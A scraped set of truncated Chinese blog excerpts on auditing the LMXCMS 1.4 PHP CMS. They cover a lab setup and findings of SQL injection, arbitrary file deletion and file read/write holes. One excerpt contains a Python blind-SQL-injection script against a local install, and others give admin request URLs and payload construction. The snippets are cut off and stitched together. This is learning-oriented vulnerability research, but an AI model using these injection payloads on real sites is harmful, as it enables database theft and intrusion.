lmxcms1.4/admin.php?m=Acquisi&a=showCjData&id=1&cid=1&lid=1 总结 这次是对php mvc框架的审计的尝试,思路是从危险函数入手,寻找可控参数变量,尝试利用触发,白盒+黑盒一起尝试可能会效果更佳,感觉自己有好多地方不足,很多都是参考网上的或者别人的思路才能完成审计实现,希望能对大家有所帮助,不足之处希望大家能够批评指正。
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://lmxcms.com/admin.php?m=Template&a=opendir&dir=default Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: ...
import requests\flag=""\url="http://127.0.0.1/lmxcms1.4/index.php?m=search&a=index&keywords=a&mid=1&remen=1%20or%20(if(ascii(substr(database(),{},1))={},1,0))%23"\for i in range(1,7):\for j in range(65,122):\res=requests.get(url.format(i,hex(j)))\if len(res.t...
1、源码下载:http://www.lmxcms.com/down/ 2、phpstorm+xdebug调试环境 3、访问 /install 目录安装 4、安装成功后访问:二、漏洞复现 1、前台TagsAction.class.php存在sql注入漏洞class TagsAction extends HomeAction{private $data;private $tagsModel = null;public...
在Lmxcms 中,存在一处后台sql注入漏洞。Lmxcms对SQL语句进行参数化,从而导致漏洞发生。 思路分析: 在后台admin目录中Bxxx.class.php文件中 搜索$id得知,是getReply函数的参数 跟踪一下getReply函数,得知下面存在selectModel函数 继续跟踪selectModel函数,得知下面存在selectDB函数 跟踪selectDB函数,下面存在sql语句的查询...
1,首先搭建网站,载入咋的lmxcms,我使用的是phpstudy。这一步相信各位师傅应该都知道,我就不啰嗦了。 2,网站搭建好之后,将代码载入PhpStorm,各位师傅也可以使用其他工具,看个人习惯! 这次代码审计我选择白加黑的形式进行审计,其优点就是能更快的发现漏洞,但是相应的缺点就是审计的不太全面, ...
lmxcms代码审计学习 前言 最近学习php代码审计,lmxcms很适合去学习代码审计,因为比较简单。 环境搭建 phpstudy+phpstorm,apache2.4.39+MySQL5.7.26,php5.3.29 网站首页 后台管理 搭建成功 框架配置 入口文件 config.inc.php配置文件 run.inc.php 初始化文件...
前言最近学习php代码审计,lmxcms很适合去学习代码审计,因为比较简单。 环境搭建源码下载地址 http://www.lmxcms.com/phpstudy+phpstorm,apache2.4.39+MySQL5.7.26,php5.3.29 网站首页 后台管理 搭建成功 框架配…
在Lmxcms 中,存在一处后台任意文件删除漏洞。Lmxcms对删除文件进行参数化,从而导致漏洞发生。 代码思路: 1、全局搜索删除文件函数unlink() 2、踪delOne函数,查看哪个函数调用了 3、跟踪发现此函数以GET方式来删除文件 4、由delOne函数可知,删除的文件目录在file/back/之下 5、构造payload得知http://127.0.0.1:8081...
在Lmxcms 中,存在一处后台任意文件读取漏洞。Lmxcms对文件名字进行参数化,从而导致漏洞发生。 思路分析: 全局搜索file_put_contents(),查看函数中包含变量跟踪put()函数,可知get方式和post方式传入参数由代码可知传入的文件在template目录下 构造payload代码template目录中得到刚刚得到写入的文件 # 代码审计 # 任意文件读...